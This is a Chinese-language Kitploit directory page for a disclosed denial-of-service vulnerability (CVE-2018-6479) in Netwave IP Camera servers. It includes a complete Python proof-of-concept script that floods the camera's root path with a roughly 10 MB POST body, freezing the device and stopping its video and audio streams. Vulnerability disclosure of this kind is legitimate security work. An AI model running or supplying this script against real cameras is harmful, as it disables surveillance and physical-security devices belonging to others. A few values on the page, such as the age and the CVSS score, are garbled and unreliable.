Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/dreadlocked/netwave-dosvulnerability
物联网安全漏洞分析漏洞利用Web应用程序漏洞利用硬件与物联网安全
GitHubdreadlocked/netwave-dosvulnerability

netwave-dosvulnerability

[CVE-2018-6479] Netwave IP Camera 服务器易受单个巨大 POST 请求导致的拒绝服务攻击。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
5528年前尚未审核

Netwave IP Camera 服务器存在未经身份验证的拒绝服务漏洞,可通过向任何固件发送一个巨大的POST请求触发。

CVE描述
CVE-2018-6479未认证的远程拒绝服务漏洞
CVSS评分详情
37.3CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:X/RL:W/RC:X

0. 引言:

在一次物联网安全研究中,在不同IP摄像头供应商的产品中发现了一些漏洞。Netwave IP Camera 是一个允许查看摄像头视频和管理摄像头的IP摄像头服务器。IP摄像头尤其用于物理安全和控制目的,因此其可用性至关重要。

1. 拒绝服务:

任何 Netwave IP Camera 都可以通过向其根路径发送一个巨大的 POST 请求而被击垮。一旦发送该请求,设备将卡住并停止流式传输音频和视频。

概念验证:针对任何 NetWave IP Camera 运行以下 Python 2.7 脚本,摄像头将立即停止响应并停止流式传输视频/音频。

root@kitploit:~
import string
import httplib
import urllib2

host = "CAMERA_IP"
port = 80
params='A'*9999999 # Huge body

headers = { 
"Host": host + ':' + str(port),
"Connection": "keep-alive",
"Content-Length": 9999999,
}

url = "/"

conn = httplib.HTTPConnection(host,port=port)
conn.request("POST",url,params,headers)
response = conn.getresponse()
data = response.read()
print data

2. 研究人员:

Gonzalo García León

下载工具